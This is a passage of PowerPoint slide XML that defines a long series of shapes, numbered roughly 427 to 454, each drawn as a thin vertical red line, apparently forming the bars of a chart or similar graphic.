          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272029" y="5838786"/>
            <a:ext cx="0" cy="152260"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76265"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="object 428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292260" y="5719592"/>
            <a:ext cx="0" cy="268028"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="135255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="134913"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="object 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292260" y="5716616"/>
            <a:ext cx="0" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="138430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137916"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="object 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312094" y="5819547"/>
            <a:ext cx="0" cy="168619"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="85089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="84472"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="object 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6312094" y="5816571"/>
            <a:ext cx="0" cy="173652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="87630">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="87475"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="object 432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331926" y="5691825"/>
            <a:ext cx="0" cy="295712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="149225">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="148925"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="object 433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331926" y="5688849"/>
            <a:ext cx="0" cy="302004"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="152400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="151928"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="object 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6352155" y="5764014"/>
            <a:ext cx="0" cy="223986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="113030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="112496"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="object 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6352155" y="5761039"/>
            <a:ext cx="0" cy="229019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="115569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="115499"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="object 436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371989" y="5652946"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="object 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371989" y="5649973"/>
            <a:ext cx="0" cy="341012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171546"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="object 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391822" y="5802891"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92878"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="object 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391822" y="5799916"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="object 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411656" y="5664058"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="162937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="object 441"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411656" y="5661083"/>
            <a:ext cx="0" cy="329687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="166369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165940"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="object 442"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6431489" y="5808442"/>
            <a:ext cx="0" cy="178686"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="90169">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="90076"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="object 443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6431489" y="5805469"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="93078"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="object 444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6451323" y="5725144"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132112"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="object 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6451323" y="5722168"/>
            <a:ext cx="0" cy="268028"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="135255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="135114"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="object 446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6471155" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="object 447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6471155" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="object 448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6490990" y="5702927"/>
            <a:ext cx="0" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="143510">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="143322"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="object 449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6490990" y="5699953"/>
            <a:ext cx="0" cy="290679"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="146685">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="146324"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="object 450"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6510822" y="5802891"/>
            <a:ext cx="0" cy="184977"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="93344">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92878"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="object 451"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6510822" y="5799916"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95880"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="object 452"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6530656" y="5625179"/>
            <a:ext cx="0" cy="362404"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="182880">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="182556"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="object 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6530656" y="5622206"/>
            <a:ext cx="0" cy="368696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="186055">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="185558"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="object 454"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550489" y="5819547"/>
            <a:ext cx="0" cy="168619"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="85089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="84472"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
